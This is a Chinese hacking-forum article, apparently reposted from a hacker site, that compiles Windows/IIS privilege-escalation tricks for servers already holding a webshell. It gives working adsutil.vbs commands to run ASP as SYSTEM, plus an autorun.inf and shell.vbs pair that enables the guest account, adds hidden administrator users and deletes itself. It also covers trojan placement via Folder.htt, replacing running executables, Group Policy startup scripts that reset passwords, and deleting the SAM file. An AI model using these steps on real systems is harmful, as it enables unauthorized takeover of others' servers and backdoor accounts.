目前流行的提权方法总结2

nsiz

19.asp.dll
引用：因为asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的机子放的位置不一定相同)  
我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll"  
"C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll"  
"C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32

\inetsrv\asp.dll"  
好了,现在你可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去了,注意

,用法中的get和set,一个是查看一个是设置.还有就是你运行上面的你要到C:\Inetpub\AdminScripts>这

个目录下. 那么如果你是一个管理员,你的机子被人用这招把asp提升为system权限,那么,这时,防的方法

就是把asp.dll T出特权一族,也就是用set这个命令,覆盖掉刚才的那些东东.

20.Magic Winmail  
前提是你要有个webshell 引用：http://www.eviloctal.com/forum/read.php?tid=3587这里

去看吧

一auto.ini 加 SHELL.VBS

autorun.inf
[autorun]  
open=shell.vbs
shell.vbs
dim wsh  
set wsh=createObject("WScript.Shell")
wsh.run "net user guest /active:yes",0
wsh.run "net user guest 520ls",0
wsh.run "net localgroup administrators guest /add",0
wsh.run "net user hkbme 520ls /add",0
wsh.run "net localgroup administrators hkbme /add",0
wsh.run "cmd.exe /c del autorun.inf",0
wsh.run "cmd.exe /c del shell.vbs",0
但是这样要可以访问到对方的根目录。将这两个文件放到对方硬盘的根目录下。当然你也可以直接执行木

马程序，还要一个木马程序，但是语句就和最后两句一样，通过CMD执行木马程序

二Folder.htt与desktop.ini
将改写的Folder.htt与desktop.ini，还有你的木马或者是VBS或者是什么，放到对方管理员最可能浏览的

目录下，觉得一个不够，可以多放几个
Folder.htt添加代码


但是后门和这两个文件必须要放到一块，有点问题，可以结合启动VBS，运行结束后，删除上传的后门.就

是CODEBASE="shell.vbs".shell写法如上

三replace
替换法，可以替换正在执行的文件。用这个几乎可以马上得到权限，但是我没有做过试验，可以试下，将

对方正在执行的文件替换为和它文件名一样的，捆绑了木马的。为什么不直接替换木马呢？如果替换的是

关键程序，那不是就直接挂了？所以还是捆绑好点
格式  
REPLACE [drive1:][path1]filename [drive2:][path2] [/A] [/R] [/W]  
REPLACE [drive1:][path1]filename [drive2:][path2] [/R] [/S] [/W]

　[drive1:][path1]filename 指定源文件。  
　[drive2:][path2] 指定要替换文件的  
　　　　　　　　　　　　　 目录。  
　/A 把新文件加入目标目录。不能和  
　　　　　　　　　　　　　 /S 或 /U 命令行开关搭配使用。  
　/P 替换文件或加入源文件之前会先提示您  
　　　　　　　　　　　　　 进行确认。  
　/R 替换只读文件以及未受保护的  
　　　　　　　　　　　　　 文件。  
　/S 替换目标目录中所有子目录的文件。  
　　　　　　　　　　　　　 不能与 /A 命令选项  
　　　　　　　　　　　　　 搭配使用。  
　/W 等您插入磁盘以后再运行。  
　/U 只会替换或更新比源文件日期早的文件。 不能与 /A 命令行开关搭配使用
这个命令没有试验过，看能不能替换不能访问的文件夹下的文件，大家可以试验下

四 脚本
编写一个启动/关机脚本配置文件scripts.ini，这个文件名是固定的，不能改变。内容如下：

[Startup]
0CmdLine=a.bat
0Parameters=

将文件scripts.ini保存到"C:\\winnt\\system32\\GroupPolicy\\Machine\\Scripts"
A.BAT的内容可以是NET USER yonghu mima  
也可以是NET USER ADMINistrator XXX  
这样可以恢复你想要得任意用户名的密码，也可以自己增加新的用户，但是要依赖重启，还有就是对

SYSTEM32有写的权限

五 SAM
如果可以访问对方的SYSTEM32的话，删除对方的SAM文件，等他重启以后就是ADMIN用户密码为空
突然又有了想法，可以用REPLACE命令替换的吗，可以把你的SAM文件提取出来，上传到他的任意目录下，

然后替换。不过不知道如果对SYSTEM32没有权限访问的话，能不能实现替换

使用FlashFXP来提升权限 最近各位一定得到不少肉鸡吧，从前段时间的动网的upfile漏洞， 动力文章

系统最新漏洞到first see发现的动网sql版本的一个超级大漏洞。有人一定忙的不易乐乎，大家的方法也

不过是使用一下asp脚本的后门罢了。至于提 升权限的问题 呵呵，很少有人能作一口气完成。关键还是

在提升权限上做个问题上，不少服务器设置的很BT，你的asp木马可能都用不了，还那里 来的提升啊。我

们得到webshell也就是个低级别的用户的权限，各种提升权限方法是可谓五花八门啊，如何提升就看你自

己的妙 招了。

其一，通过替换系统服务来提升。

其二，查找conn和config这类型的文件看能否得到sa或者mysql的相关密码，可能会有所收获等等。
本人在一次无聊的入侵过程中发现了这个方法，使用Flashfxp也能提升权限，但是成功率高不高就看你自

己的运气了


将asp权限提到最高
本来是要写个提权asp木马的，可惜时间不是太多功底也不是太深。先把原理方法告诉大家好了。简单说

说，说的太麻烦没有必要。懂了就行。  
原理：  
asp文件的教本解释是由asp.dll运行的。由dllhost.exe启动的。身分是IWAN_NAME。若是把asp.dll放到

inprocesslsapiapps中那它就是由inetifo.exe直接启动。身份是system 方法：

第一步。  
得到inprocesslsapiapps内容，用命令"cscript C:\\Inetpub\\AdminScripts\\adsutil.vbs get

w3svc/inprocessisapiapps"。将得到的一组dll复制下来。

第二步  
写一个bat内容为"cscript C:\\Inetpub\\AdminScripts\\adsutil vbs set w3svc/inprpocessisapiapps

"C:\\Inetpub\\AdminScripts\\asp.dll" ·····  
省略号为复制下的内容。中间用空格分开不要带回车符  
最后运行这个bat就行了。  
例如：  
我用"cscript C:\\Inetpub\\AdminScripts\\adsutil.vbs get w3svc/inprocessisapiapps"得到  
"c:\\winnt\\system32\\inetsrv\\httpext.dll"  
"c:\\winnt\\system32\\inetsrv\\httpodbc.dll"  
"C:\\WINNT\\system32\\inetsrv\\ssinc.dll"  
"C:\\WINNT\\System32\\msw3prt.dll"  
"C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server

Extensions\\isapi\\_vti_aut\\author.dll"  
"C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server

Extensions\\isapi\\_vti_adm\\admin.dll"  
"C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\isapi\\shtml.dll"

那么你的bat就应该是：

cscript C:\\Inetpub\\AdminScripts\\adsutil vbs set w3svc/inprpocessisapiapps

"C:\\Inetpub\\AdminScripts\\asp.dll" "c:\\winnt\\system32\\inetsrv\\httpext.dll"

"c:\\winnt\\system32\\inetsrv\\httpodbc.dll" "C:\\WINNT\\system32\\inetsrv\\ssinc.dll"

"C:\\WINNT\\System32\\msw3prt.dll" "C:\\Program Files\\Common Files\\Microsoft Shared\\Web

Server Extensions\\isapi\\_vti_aut\\author.dll" "C:\\Program Files\\Common Files\\Microsoft

Shared\\Web Server Extensions\\isapi\\_vti_adm\\admin.dll" "C:\\Program Files\\Common

Files\\Microsoft Shared\\Web Server Extensions\\isapi\\shtml.dll"

已测试成功！！
本篇文章来源于 新世纪网安基地 (www.520hack.com) 原文出处：http://www.520hack.com/Article/Text2/200810/11685.html